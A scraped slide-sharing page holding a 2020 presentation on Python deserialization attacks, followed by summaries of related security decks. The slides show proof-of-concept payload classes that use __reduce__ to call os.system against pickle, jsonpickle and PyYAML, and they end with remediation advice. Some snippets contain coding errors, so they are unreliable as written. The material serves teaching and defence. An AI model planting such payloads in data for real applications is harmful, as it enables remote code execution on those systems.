Python Deserialization Attacks

1 like1,092 views

The document discusses Python deserialization attacks, outlining the concepts of serialization and deserialization and their related vulnerabilities. It highlights various Python modules, including pickle, jsonpickle, and pyyaml, that can be exploited through deserialization, providing examples of potential attacks. Recommendations for remediation emphasize the importance of not deserializing untrusted data and using safer methods available in the mentioned modules.

Python Deserialization Attacks
By Manmeet Singh
Date - 28/04/2020

Contents
● Serialization Concept
● Why Deserialization tends to a vulnerability ?
● Python Modules vulnerable to Deserialization Vuln.
● Pickle Module
● JSONPickle Module
● PyYAML Module
● Remediation

Structured Data
Variables
Lists
Strings
Custom Objects
Text
Readable or
Unreadable (Bytes)
stream format

Why we need serialization?
1. Recovery of original Structure.
2. Minimize the bandwidth.
3. Calling of class objects.

● Thick client application and
desktop programs. Example :
metasploit, Pycharm, Intellij
IDEA etc.
● APIs.
● Mobile applications
Where is Serialization getting used ?

Why Deserialization
tends to a vulnerability
?

Objects of classes can be
serialized…
And when they get
deserialized, the class
objects are reformed and do
it purpose.

Yes, Calling of any existing
class method is possible ..
Even os.system()

Do developer of serialization libraries
knew this?

Why it was made then?
Application
Class A
Class B
def abc():
...
Dynamically working with classes

Python Serialization Modules
Vulnerable To Deserialization
Vulnerability

● Pickle
● jsonpickle
● Pyyaml
● ruamel.yaml

Pickling is a way to convert a python object (list, dict, etc.) into a
character stream. The idea is that this character stream contains all the
information necessary to reconstruct the object in another python script.

Serialization using pickle - pickle.dumps(Object)
Deserialization using pickle - pickle.loads(stream)
How to pickle and de-pickle ?

Byte stream ending with . (dot)
Detecting use of pickle module

from pickle import dumps
import os
class payload(objects):
def __reduce__(self):
return os.system, (“dir”,)
print(dumps(payload()))
How to exploit pickle deserialization ?

from pickle import loads
loads(stream)
How to exploit pickle deserialization ?

jsonpickle will serialize complex Python objects to and from JSON.It also
convert a pickled object into human readable form.

Serialization using jsonpickle - jsonpickle.encode(Object)
Deserialization using jsonpickle - jsonpickle.decode(stream)
How to jsonpickle and json de-pickle ?

It looks like normal JSON stream of data. Sometimes have a tag “py/” in it.
Detecting use of jsonpickle module

from jsonpickle import encode
import os
class payload(objects):
def __reduce__(self):
return os.system, (“dir”,)
print(decode(payload()))
How to exploit jsonpickle deserialization ?

from jsonpickle import decode
decode(stream)
How to exploit jsonpickle deserialization ?

Pyyaml python module is used to serialize objects in YAML (Yet Another
Markup Language) format. So this module is used to process YAML data.
● Pyyaml version < 5.1 is directly vulnerable. (CVE-2017-18342)
● Pyyaml version >=5.1 and < 5.2 is vulnerable under certain
condition. (CVE-2019-20477)
● Latest version 5.3.1 of Pyyaml is not vulnerable.

Serialization using pyyaml - yaml.dump(Object)
Deserialization using pyyaml - yaml.load(stream)
How to YAML serialize and deserialize ?

It will be in a YAML format.
Detecting use of pyyaml/ruamel.yaml modules

from yaml import dump
import os
class payload(objects):
def __reduce__(self):
return os.system, (“dir”,)
print(dump(payload()))
How to exploit pyyaml deserialization ?

from yaml import load
load(stream)
How to exploit pyyaml deserialization ?

Remediations
For jsonpickle and pickle,
Here, the general take-away would be the rule of thumb “Do not deserialize untrusted
data”
For Pyyaml,
● Use safe_dump() and safe_load() instead of dump() and load().
● Use latest version of pyyaml.

Public-key cryptosystems emerged to address issues in symmetric encryption, specifically key distribution and digital signatures. Users generate a pair of keys, with one public and one private, enabling secure message encryption, decryption, and authentication. Requirements for effective public-key cryptography include easy key generation, efficient encryption and decryption processes, and strong resistance against adversaries attempting to derive private keys or original messages.

CRYPTOGRAPHY AND NETWORK SECURITYKathirvel Ayyaswamy

The document discusses cryptography and network security, focusing on discrete logarithms, the Diffie-Hellman (DH) key exchange, ElGamal public key cryptosystems, hash functions, digital signatures, and elliptic curve cryptography (ECC). It explains the principles of DH key exchange, how ElGamal encryption works, and the importance of pseudorandom number generation in securing cryptographic systems. Additionally, it highlights the security measures and challenges in public-key cryptography and the role of hash functions in message authentication.

Module 4 Enumerationleminhvuong

The document discusses techniques for enumerating information from systems during the hacking process. It describes establishing null sessions to extract user names, shares, and other details without authentication. Tools like DumpSec, Netview, Nbtstat, GetAcct, and PS Tools are also covered as ways to enumerate users, groups, shares, permissions, and more from Windows and UNIX systems. The document also provides countermeasures like restricting null sessions and the anonymous user to protect against enumeration attacks.

Pentesting Android ApplicationsCláudio André

The document outlines essential tools and methods for penetration testing of Android applications, including environment setup and various debugging and analysis tools. Key tools mentioned include the Android Debug Bridge (ADB), Dalvik Debug Monitor Server (DDMS), and security testing frameworks like Drozer and Burp Suite. It also highlights key security risks and best practices for developers to mitigate vulnerabilities in their apps.

Double DES & Triple DESHemant Sharma

The document provides an overview of Data Encryption Standard (DES), including its variations like Double DES and Triple DES. Double DES uses two encryption keys but is vulnerable to meet-in-the-middle attacks, while Triple DES enhances security by using three stages of DES with either two or three keys. Triple DES is considered stronger than Double DES, though both involve complex key management and potential vulnerabilities.

Network Attacks and Countermeasureskaranwayne

This document discusses various types of network attacks and countermeasures. It describes mapping to study a victim's network before attacking, packet sniffing where a host can read unencrypted communication, spoofing where an attacker takes a target's IP address to remain anonymous, and DoS/DDoS attacks which aim to overload services and bring them down. Hijacking combines different attack techniques to disrupt an entire network. The document provides details on each attack method and their techniques.

How To Improve Quality With Static Code Analysis Perforce

The document discusses the importance of static code analysis in improving software quality, emphasizing that bug-free software is difficult to achieve, and automated tools are essential for enhancing security and reliability at lower costs. It contrasts static analysis with manual code review and dynamic testing, highlighting the benefits of automated tools in detecting bugs and ensuring compliance with coding standards. The presentation also outlines the integration of static code analysis into the software development lifecycle and promotes Perforce's solutions for managing code quality.

Java Exception handlingkamal kotecha

The document discusses exception handling in Java. It defines exceptions as runtime errors that occur during program execution. It describes different types of exceptions like checked exceptions and unchecked exceptions. It explains how to use try, catch, throw, throws and finally keywords to handle exceptions. The try block contains code that might throw exceptions. The catch block catches and handles specific exceptions. The finally block contains cleanup code that always executes regardless of exceptions. The document provides examples of exception handling code in Java.

Introduction to Android pptTaha Malampatti

Android is an open-source, Linux-based operating system for mobile devices, developed by Google and the Open Handset Alliance. It has been released in a series of versions named after food items, starting from version 1.0 in 2008, with various features enhancing functionalities over time. The Android architecture includes core applications, an application framework, libraries, Android runtime, and relies on a Linux kernel for essential system services.

CrytographyMostak Ahmed

The document discusses research approaches in cryptography. It outlines objectives to analytically study existing cryptographic systems and algorithms, compare their time and space complexity, and simulate vulnerabilities to cryptanalytic attacks. Common network attacks like wiretapping and denial of service are described along with solutions like encryption, authentication, and integrity checking. The RSA and Caesar ciphers are explained along with their encryption/decryption steps. MATLAB was used to implement RSA and Caesar and compare their time complexity.

Pentesting Android AppsAbdelhamid Limami

This document discusses pentesting Android apps. It provides an overview of Android architecture and common attack surfaces, including the client software, communications channels, and server-side infrastructure. It describes setting up an environment for app analysis, exploiting vulnerabilities like insecure storage and logical flaws. The document demonstrates capturing network requests, reverse engineering apps, and provides developer tips to improve security like encrypting sensitive data and input sanitization.

Unit 3KRAMANJANEYULU1

This document provides an overview of number theory and its applications to asymmetric key cryptography. It begins with definitions of prime numbers, relatively prime numbers, and modular arithmetic. It then covers the Euclidean algorithm for finding the greatest common divisor of two numbers, Fermat's and Euler's theorems, and the Chinese Remainder Theorem. The document concludes with an introduction to public key cryptography, including the basic principles, requirements, and the RSA algorithm as a widely used example of an asymmetric encryption scheme.

StegnographySonal Kathel

Steganography is the practice of concealing communication within other information, primarily using digital images. It differentiates itself from cryptography, as it hides the existence of the message rather than encrypting its content. Historical examples and modern techniques illustrate its application, while the document also discusses related concepts such as compression methods, advantages and disadvantages, and future developments in steganography.

Cryptographic hash function md5Khulna University, Khulna, Bangladesh

This document discusses the MD5 cryptographic hash function. It provides an introduction to hash functions and describes MD5, including its features, applications, algorithm, analysis, and drawbacks. MD5 produces a 128-bit hash value from a message of any size through a multi-step process involving padding, appending a length, initializing buffers, and processing in 16-word blocks. While once widely used, MD5 is now considered broken due to vulnerabilities found in its compression function and preimage resistance.

Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov

The document discusses various methods attackers can use to launch executables remotely on Windows systems by leveraging compromised credentials and built-in OS functionality. It describes techniques like copying files over SMB, using WMI, WinRM, PowerShell remoting, scheduled tasks, and others. For each technique, it outlines the required network access and system privileges, and provides the most relevant event log entries that could be used for detection. The goal is to help analysts understand lateral movement techniques and know what to look for when hunting for suspicious remote executions in Windows logs and environments.

Hash function Salman Memon

A hash function compresses input data into a shorter, fixed-length output known as a hash value, often used for file integrity checks, password encryption, and data verification. It serves as a digital fingerprint, making it nearly impossible to alter the original data without changing the hash. Various hash functions exist, including MD5, SHA, and HMAC, each with specific applications and characteristics.

Password Attack Sina Manavi

The document outlines a hacking methodology focused on password attacks, featuring various techniques such as brute force, dictionary, and phishing attacks. It includes practical demonstrations and tools for password cracking, along with guidance on secure password practices and password hardening techniques. Additionally, it touches on the importance of password policy and the implementation of biometric technologies to enhance security.

OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff

The document is a presentation on Java's object serialization and deserialization, detailing the processes, APIs, and potential vulnerabilities associated with them. It explains how serialized objects are transformed into a flat data stream for storage or transmission, the structure of serialized data, and the security risks of deserialization attacks. Additionally, it explores the use of gadget chains in exploiting improper deserialization, which can lead to code execution vulnerabilities.

Elliptic Curve Cryptography and Zero Knowledge ProofArunanand Ta

The document covers elliptic curve cryptography (ECC) and zero knowledge proofs (ZKP), exploring their mathematical foundations, applications in public key cryptography, and efficiencies compared to traditional methods like RSA. It introduces key concepts such as group structures, discrete logarithm problems, and the implementation of ECC in various systems. Additionally, it discusses properties, advantages, and real-world applications of zero knowledge proofs, highlighting their role in secure authentication and data integrity.

Internet Key Exchange ProtocolPrateek Singh Bapna

The Internet Key Exchange (IKE) protocol, as defined in RFC 2409, is used for automatic key management and security association establishment in IPsec networks. IKE operates in two phases, negotiating security associations and keying material through a secure session between peers, primarily utilizing the Diffie-Hellman algorithm for key exchange. The protocol also includes defined mechanisms for peer authentication and session protection through various cryptographic algorithms.

Understanding android security modelPragati Rai

The document provides a comprehensive overview of the Android security model, detailing its architecture, permissions, and components involved in app security. It emphasizes the importance of understanding Android security for developers, covering concepts like application signing, intent management, and external storage encryption. Additionally, it outlines best practices for securing sensitive data and permissions through the AndroidManifest.xml file.

Security Development Lifecycle Toolsn|u - The Open Security Community

This document discusses security development lifecycle tools presented by Sunil Yadav. It describes SDL as a Microsoft process to define security requirements and minimize issues. Key SDL tools covered are Binscope for binary analysis, SDL Regex Fuzzer for testing regular expressions, Code Analysis Tool (CAT.NET) for identifying vulnerabilities, and Minifuzz File Fuzzer for detecting flaws in file handling code. Demos and references are provided for each tool.

Blow fish final pptAjay AJ

This document discusses the design and implementation of the Blowfish encryption algorithm using Verilog HDL. Blowfish is a symmetric block cipher that uses a variable-length key from 32 to 448 bits, making it suitable for securing data. The algorithm consists of two parts - key expansion and a round structure involving 16 rounds of operations. The authors implemented Blowfish using Verilog HDL on a Xilinx FPGA for applications requiring encryption like IoT devices. Their design achieved high-speed encryption of up to 4 bits per clock cycle and operated at a maximum frequency of 50MHz.

sqlmap internalsMiroslav Stampar

The document provides an overview of sqlmap, a free and open-source penetration testing tool designed to detect and exploit SQL injection flaws in databases. It covers its capabilities, including support for various database management systems and multiple SQL injection techniques, as well as advanced features like session data storage, big data handling, heuristic methods for effective exploitation, and techniques for bypassing web application firewalls. Additionally, the document discusses performance enhancements, false-positive detection mechanisms, and functionalities for hash cracking and data exfiltration.

Java oops and fundamentalsjavaease

The document outlines key concepts of object-oriented programming (OOP) including classes, inheritance, abstraction, encapsulation, and polymorphism. It explains how Java identifiers are defined and introduces operators, expressions, and statements in the language, including control flow statements like if-then and switch. Various programming constructs and their syntax are provided with examples to illustrate OOP principles and Java's functionality.

Android studio installationPoojaBele1

Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov

The document discusses credential dumping techniques in Windows environments, highlighting methods used by various threat actor groups to extract sensitive information from systems, including tools like Mimikatz and WCE. It emphasizes the importance of detecting such activities through system logs (Sysmon and Windows Event Logs) and outlines potential data sources such as LSASS memory, SAM registry hives, and other offline methods. Additionally, it touches on the use of native Windows features for monitoring and auditing access to sensitive data, providing practical guidance for detecting credential extraction attempts.

Android activity lifecycleSoham Patel

An activity in an application provides a user interface for interaction, and multiple activities within an app are loosely connected. The activity life cycle involves several key states: onCreate, onStart, onResume, onPause, onStop, and onDestroy, each triggered during specific user interactions or system events. Activities are managed in a stack where the currently active activity is on top, and can be paused, stopped, or destroyed based on user actions or system requirements.

How Eggxactly Insecure Deserialization Exploit works(1).pdfNullHyderabad

This document discusses insecure deserialization exploits. It explains how serialization works by converting objects into a format that can be stored, transmitted, and reconstructed. It notes that while useful for these purposes, serialization with formats like Python Pickle can be insecure if untrusted data is deserialized. It describes how an attacker can leverage __reduce__() to craft a payload that executes remote code if unserialized. The document provides recommendations for detecting, exploiting, and preventing such deserialization attacks.

Python Pickle Module.pdfSudhanshiBakre1

More Related Content

What's hot (20)

Introduction to Android pptTaha Malampatti

CrytographyMostak Ahmed

Pentesting Android AppsAbdelhamid Limami

Unit 3KRAMANJANEYULU1

StegnographySonal Kathel

Cryptographic hash function md5Khulna University, Khulna, Bangladesh

Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov

Hash function Salman Memon

Password Attack Sina Manavi

OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff

Elliptic Curve Cryptography and Zero Knowledge ProofArunanand Ta

Internet Key Exchange ProtocolPrateek Singh Bapna

Understanding android security modelPragati Rai

Security Development Lifecycle Toolsn|u - The Open Security Community

Blow fish final pptAjay AJ

sqlmap internalsMiroslav Stampar

Java oops and fundamentalsjavaease

Android studio installationPoojaBele1

Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov

Android activity lifecycleSoham Patel

Introduction to Android pptTaha Malampatti

CrytographyMostak Ahmed

Pentesting Android AppsAbdelhamid Limami

Unit 3KRAMANJANEYULU1

StegnographySonal Kathel

Cryptographic hash function md5Khulna University, Khulna, Bangladesh

Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov

Hash function Salman Memon

Password Attack Sina Manavi

OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff

Elliptic Curve Cryptography and Zero Knowledge ProofArunanand Ta

Internet Key Exchange ProtocolPrateek Singh Bapna

Understanding android security modelPragati Rai

Security Development Lifecycle Toolsn|u - The Open Security Community

Blow fish final pptAjay AJ

sqlmap internalsMiroslav Stampar

Java oops and fundamentalsjavaease

Android studio installationPoojaBele1

Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov

Android activity lifecycleSoham Patel

Similar to Python Deserialization Attacks (18)

How Eggxactly Insecure Deserialization Exploit works(1).pdfNullHyderabad

Python Pickle Module.pdfSudhanshiBakre1

Vlada Kulish - Why So Serial?OWASP Kyiv

This document discusses serialization vulnerabilities and provides examples of how deserialization attacks work. It begins with an overview of serialization and why it is important. It then covers different serialization formats like binary, JSON, XML and examples of vulnerabilities in Java, Ruby, PHP, .NET and other languages. Useful links are also provided to learn more about detecting and exploiting serialization vulnerabilities.

Data Serialization in Python JSON vs. PickleInexture Solutions

The document discusses data serialization in Python, focusing on two formats: JSON and Pickle. It highlights the benefits and drawbacks of each, including JSON's human-readable format and compatibility with various languages, while noting Pickle's ability to handle complex Python objects but lack of interoperability with other programming languages. It emphasizes the importance of serialization for data storage, transmission, and object persistence in software development.

(De)serial Killers - BSides Las Vegas & AppSec IL 2018Checkmarx

The document provides an overview of serialization and deserialization, highlighting their processes, types, and potential security risks associated with untrusted data inputs. It discusses real-world exploitation scenarios, particularly regarding Java and .NET, emphasizing the dangers of naive deserialization and presenting mitigation strategies. The author, Dor Tumarkin, shares insights from their experience in application security, concluding that while deserialization can be useful, it poses significant risks if not handled correctly.

(De)serial Killers - BSides Las Vegas & AppSec IL 2018Dor Tumarkin

This document provides an overview of serialization and deserialization, including potential exploitation. It begins by defining serialization as the process of translating data structures into a transmittable format. It then discusses common serialization formats and deserialization as reconstructing objects from serialized data. The document demonstrates deserialization in code and outlines real-world use cases. It also explores how untrusted deserialization can enable remote code execution attacks in languages like Java, .NET, Python, and PHP. Specific exploitation techniques are demonstrated, including using message queues and distributed systems. The document concludes by discussing additional risks of deserialization and how it has become a significant industry security issue.

Sour PicklesSensePost

The document outlines a guide on exploiting Python's pickle serialization, detailing how to create remote code execution (RCE) vulnerabilities through improper use of serialization functions like dumps() and loads(). It emphasizes understanding the inner workings of the pickle protocol and the potential for injection attacks, while providing examples of shellcode techniques and attacks that leverage pickle streams. The guide also discusses various approaches to bypassing Python's security measures and creating reliable shellcode across different platforms.

Infecting Python BytecodeIftach Ian Amit

The document discusses a hackathon project called Pytroj, which focuses on creating a self-infecting payload for Python files. Pytroj targets .pyc files, injecting itself to execute original bytecode while maintaining timestamps to avoid detection. The document also highlights methods for minimizing the payload size and the potential for malicious applications, such as installing harmful packages through pip.

Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Christian Schneider

The document discusses vulnerabilities related to Java serialization, particularly focusing on deserialization attacks which have gained attention due to new gadgets in libraries such as Apache Commons Collections. It provides a detailed analysis of how attackers can exploit serialization and deserialization methods, highlighting specific gadgets and demonstrating various attack scenarios. The talk also critiques existing mitigation strategies and suggests best practices for identifying and addressing these vulnerabilities in Java applications.

Breakfast cereal for advanced beginnersTruptiranjan Nayak

Java deserialization vulnerabilities allow attackers to exploit object serialization to influence in-memory program objects and code flow. If an attacker controls serialized data passed to a deserialization routine, they can manipulate the program. This has led to remote code execution attacks. Vendors have tried to mitigate this by blacklisting or whitelisting dangerous classes, but full remediation requires code changes. Exploits have included binary, XML, and text payloads triggering vulnerabilities in Spring, Weblogic, and other platforms.

BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference

Jonathan Birch from Microsoft discusses how misuse of serialization in .NET can lead to remote code execution (RCE) vulnerabilities. He explains how serialization works and how untrusted data streams containing type information can be exploited to instantiate dangerous classes and execute arbitrary code. He provides advice on how to prevent these vulnerabilities, such as using serialization formats without type information, constraining allowed types, and validating streams have not been modified.

Understanding Data Abstraction and Encapsulation in PythonJulie Bowie

The document explains the concepts of abstraction and encapsulation in Python, highlighting their significance in simplifying complex systems and protecting data integrity. Abstraction allows developers to focus on high-level functionalities while hiding implementation details, whereas encapsulation restricts access to an object's data and methods. Together, these principles enhance code maintainability, security, and scalability in software development.

Py jail talkUTD Computer Security Group

The document discusses Python jails (PyJails), which are CTF problems that provide a limited Python interpreter. The goal is typically to call restricted functions like os.system() or open() to access files. Common solutions leverage attributes of Python objects like __class__, __globals__, and __builtins__ to access the open() function despite restrictions. The document then provides an in-depth explanation of these Python object attributes and how they allow constructing a solution to bypass the restrictions in a PyJail.

Reversing the dropbox client on windowsextremecoders

The document discusses reversing an obfuscated Dropbox Python client executable on Windows. It begins by unpacking the executable using py2exe to extract the embedded Python bytecode files (.pyc). The extracted .pyc files are encrypted, so the document explores dumping them from memory after the Dropbox Python interpreter decrypts them. This fails due to encryption of the bytecode. The document then leverages the PyPy Python implementation to successfully dump and decrypt one of the .pyc files. Further exploration of the PyCodeObject structure in a debugger reveals Dropbox has modified the layout to hinder reversing. A small program is used to find the actual offset of the encrypted bytecode within the PyCodeObject.

Reversingobfuscatedpythonapplications dropbox-140819110311-phpapp01Wajhi Ul Hassan Naqvi

The Offensive Python: Practical Python for Penetration TestingSatria Ady Pradana

This document discusses the use of Python for penetration testing in cybersecurity, highlighting its advantages such as rapid prototyping and extensive libraries. It covers various topics including networking, cryptography, and advanced tools like Scapy for packet manipulation and Angr for binary analysis. The focus is on demonstrating Python's power in cyber security rather than teaching programming fundamentals.

The Offensive Python - Practical Python for Penetration TestingSatria Ady Pradana

The document introduces practical Python for penetration testing, emphasizing Python's rapid prototyping capabilities and extensive libraries which make it ideal for cybersecurity tasks such as network manipulation and cryptography. It outlines various tools and libraries like Scapy for packet crafting and Angr for automated binary analysis, highlighting their functionalities in the realm of cyber security. The author aims to teach advanced Python coding with a focus on real-world applications in penetration testing and network manipulation.

Deserialization vulnerabilitiesGreenD0g

The document discusses deserialization vulnerabilities across various programming languages, particularly Java, emphasizing the complexities involved in the deserialization process. It highlights potential security risks, such as arbitrary object creation and method invocation, and suggests methods for mitigating these risks through type checking and whitelisting. The importance of understanding different serialization formats and libraries, as well as recent exploits, is also covered.

How Eggxactly Insecure Deserialization Exploit works(1).pdfNullHyderabad

Python Pickle Module.pdfSudhanshiBakre1

Vlada Kulish - Why So Serial?OWASP Kyiv

Data Serialization in Python JSON vs. PickleInexture Solutions

(De)serial Killers - BSides Las Vegas & AppSec IL 2018Checkmarx

(De)serial Killers - BSides Las Vegas & AppSec IL 2018Dor Tumarkin

Sour PicklesSensePost

Infecting Python BytecodeIftach Ian Amit

Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Christian Schneider

Breakfast cereal for advanced beginnersTruptiranjan Nayak

BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference

Understanding Data Abstraction and Encapsulation in PythonJulie Bowie

Py jail talkUTD Computer Security Group

Reversing the dropbox client on windowsextremecoders

Reversingobfuscatedpythonapplications dropbox-140819110311-phpapp01Wajhi Ul Hassan Naqvi

The Offensive Python: Practical Python for Penetration TestingSatria Ady Pradana

The Offensive Python - Practical Python for Penetration TestingSatria Ady Pradana

Deserialization vulnerabilitiesGreenD0g

More from NSConclave (20)

RED-TEAM_ConclaveNSConclave

An APT29 simulation was conducted using the MITRE ATT&CK framework involving 3 virtual machines - an attacker system, domain controller, and 2 Windows workstations. The simulation began with generating a PowerShell payload using Pupy and delivering it to a workstation by disguising it as a document file. Once executed, the payload established a command and control connection back to the attacker, initiating the first stage of the simulated APT29 intrusion.

Create a Custom Plugin in Burp Suite using the ExtensionNSConclave

This document discusses creating a custom plugin in Burp Suite using the extension framework. It provides advantages of using the extension, requirements, an overview of implementing request and response functions on the server, server helper functions, and a demo of creating a custom plugin that decrypts and encrypts requests and responses for a bank web application. The presentation agenda includes an introduction, block diagram, requirements, running the server, request and response functions, server helper functions, and a demo.

IOT SECURITY ASSESSMENT Pentester's ApproachNSConclave

This document discusses the pentester's approach to assessing the security of an IoT device. It outlines various attack surfaces at the hardware, software, and communication levels. The pentester's process involves understanding the device architecture, extracting and analyzing the firmware to obtain sensitive information like passwords, getting into the device's network, analyzing its communication protocol, duplicating requests to control the device remotely. Specific hardware hacking techniques are described like identifying communication points to dump the firmware directly from memory chips or by desoldering and reading the chip's contents.

Debugging Android Native LibraryNSConclave

The document outlines a presentation on debugging Android native libraries, focusing on concepts such as JNI, static and dynamic debugging techniques. It discusses the use of tools like IDA and Frida for runtime analysis and outlines a specific task involving a vulnerable application. Requirements for completing the task include a rooted Android device and specific software tools for decompiling and debugging native libraries.

Burp Suite Extension DevelopmentNSConclave

The document is a presentation by Jagdish Jogal about developing extensions for Burp Suite using Jython/Python to enhance penetration testing by automatically decrypting and encrypting complex requests and responses. It covers various testing scenarios, essential programming concepts, and how to utilize the Burp Suite API for custom functionality. Attendees will learn how to create a custom text editor tab for real-time data modification and improve their security testing methodologies.

Log AnalysisNSConclave

The document discusses log analysis and its components, including the importance of audit trail records for mitigating risks and meeting compliance regulations. It outlines how logs are generated, the various tools available for analysis, and some key use cases such as responding to data breaches and troubleshooting systems. Additionally, it differentiates between log monitoring and log analysis, emphasizing the latter's role in detecting intrusions.

Regular Expression InjectionNSConclave

Regular Expression Injection occurs when an attacker supplies malicious input that modifies the intended regular expression in a way that breaks the program's specifications. This can impact control flow, leak information, or cause denial-of-service vulnerabilities. The document discusses regular expressions, how to find regular expression injection issues through error-based or blind injection techniques, demonstrates an example exploit, and provides mitigation strategies like input validation before using regular expressions and killing expressions that take too long.

HTML5 Messaging (Post Message)NSConclave

This document discusses HTML5 postMessage and cross-origin messaging. It begins with an overview of postMessage, how it works, and how it can be exploited in cross-site scripting attacks. It then explains how the same-origin policy impacts postMessage and provides examples of same-origin violations. The document emphasizes that to prevent XSS, the postMessage origin must be correctly checked. It includes code demos and references to illustrate postMessage workings, attacks, and proper origin validation.

Node.js DeserializationNSConclave

This document discusses node.js deserialization and exploitation examples. It provides an overview of node.js as server-side JavaScript. Deserialization is converting an object from a byte stream back into memory. The document demonstrates two exploitation examples, the first using an unprotected API and the second targeting node.js deserialization. It recommends input sanitization and blocking/replacing methods as remediation techniques.

RIA Cross Domain PolicyNSConclave

This document discusses cross-domain policy and the crossdomain.xml file. It provides examples of how a misconfigured crossdomain.xml file that allows access from any domain using a wildcard could be exploited to gather sensitive user information or perform unauthorized actions. The vulnerability can be remediated by hardcoding allowed domains instead of using a wildcard and implementing cross-site request forgery prevention.

LDAP InjectionNSConclave

This document discusses LDAP injection, an attack where malicious code is inserted into a user input field to gain unauthorized access. It provides an overview of LDAP syntax and injection, demonstrating how an attacker can bypass authentication by closing parentheses in the username field. The document also notes LDAP injection can lead to privilege escalation and information disclosure. It recommends escaping special characters, using frameworks that encode LDAP queries, and applying least privilege to secure applications from LDAP injection.

SandboxingNSConclave

Sandboxing involves running malware in an isolated environment to analyze its behavior without exposing other systems. Cuckoo Sandbox is an open source tool that can analyze Windows, macOS, Linux, and Android malware this way. However, sandbox-evading malware can detect it is running in a sandbox and avoid revealing its malicious code until it is outside the sandbox. Such malware uses techniques like detecting user interactions, system characteristics, timing-based approaches, and obfuscating internal data to bypass detection in sandboxing.

NoSql InjectionNSConclave

This document summarizes a presentation on NoSQL injection given by Husseni Muzkkir. The presentation covered the differences between SQL and NoSQL databases, what NoSQL injection is and how it can be used to expose unauthorized information or modify data. It also described a NoSQL lab that was created with possible attack scenarios like authentication bypass, enumeration, data manipulation, and MongoDB injection. The presentation provided examples of insecure coding that could enable these attacks and discussed secure coding practices and a related CVE vulnerability.

Thick Client Testing AdvancedNSConclave

Thick Client Testing BasicsNSConclave

The document provides an introduction to thick client applications, distinguishing them from thin client and web applications, and detailing their architecture. It covers key vulnerabilities, testing methodologies, and tools for testing thick clients, including dynamic, local storage, and memory testing. Additional insights include the importance of monitoring sensitive data in local storage and registry, and techniques for reverse engineering thick client applications.

MarkdownNSConclave

This document discusses effective use of markdown with various online and offline tools. It begins by introducing the author and briefly describing markdown. It then lists several popular online markdown editors like StackEdit, Dillinger, and GitHub. Examples are provided of common markdown syntaxes. The document demonstrates the markdown preview features of offline editors like Sublime Text and Visual Studio Code. It concludes by providing the author's contact information.

Docker 101NSConclave

The document provides an introduction to Docker, explaining it as a tool for deploying applications in isolated containers which share the host OS's kernel. It covers key concepts such as images, containers, Docker daemon, and client, alongside commands for pulling images, running containers, and managing them. Additionally, it introduces Dockerfile for image creation and mentions a GUI tool, Portainer.

Security Architecture Consulting - Hiren ShahNSConclave

The document discusses security architecture consulting, focusing on cross-selling, personalization, innovation support, and seamless user experiences across various digital platforms. It highlights the importance of addressing security vulnerabilities in system administration and emphasizes the need for robust authentication, authorization, and encryption protocols to safeguard sensitive data. Additionally, it outlines the steps for a thorough security review, including user access management, cryptography management, and application deployment processes to ensure comprehensive security measures are in place.

OSINT: Open Source Intelligence - Rohan BraganzaNSConclave

The document provides an overview of Open Source Intelligence (OSINT), its origins, and how it is utilized to gather information from public sources. It discusses various tools and techniques for OSINT activities, including Kali Linux, OSINT Framework, and tools like TheHarvester and Shodan. Key concepts include identifying targets, understanding digital footprints, and assessing security through intelligence gathering.

Lets get started with car hacking - Ankit JoshiNSConclave

This document discusses car hacking, emphasizing the vulnerabilities within modern vehicles' electronic control units (ECUs) and the CAN (Controller Area Network) protocol that connects them. Key security issues identified include hard-coded Bluetooth pins, weak WPA2 passwords, and insecure firmware updates. The document also provides resources for further learning about car hacking techniques and protocols.

RED-TEAM_ConclaveNSConclave

Create a Custom Plugin in Burp Suite using the ExtensionNSConclave

IOT SECURITY ASSESSMENT Pentester's ApproachNSConclave

Debugging Android Native LibraryNSConclave

Burp Suite Extension DevelopmentNSConclave

Log AnalysisNSConclave

Regular Expression InjectionNSConclave

HTML5 Messaging (Post Message)NSConclave

Node.js DeserializationNSConclave

RIA Cross Domain PolicyNSConclave

LDAP InjectionNSConclave

SandboxingNSConclave

NoSql InjectionNSConclave

Thick Client Testing AdvancedNSConclave

Thick Client Testing BasicsNSConclave

MarkdownNSConclave

Docker 101NSConclave

Security Architecture Consulting - Hiren ShahNSConclave

OSINT: Open Source Intelligence - Rohan BraganzaNSConclave

Lets get started with car hacking - Ankit JoshiNSConclave

Recently uploaded (20)

About Certivo | Intelligent Compliance Solutions for Global Regulatory Needscertivoai

Certivo delivers intelligent compliance solutions designed to simplify and automate regulatory management for modern businesses in the USA, UK, and EU. Our AI-driven compliance platform helps enterprises navigate complex requirements with ease, offering real-time automated compliance monitoring and powerful product compliance software. At Certivo, we’re driven by a mission to transform how companies handle compliance, reducing risk and boosting operational efficiency. Discover our core values, vision, and innovation behind our trusted compliance management solutions. Whether you're in life sciences, automotive, or tech, Certivo helps you simplify regulatory compliance and scale faster with confidence.

Meet You in the Middle: 1000x Performance for Parquet Queries on PB-Scale Dat...Alluxio, Inc.

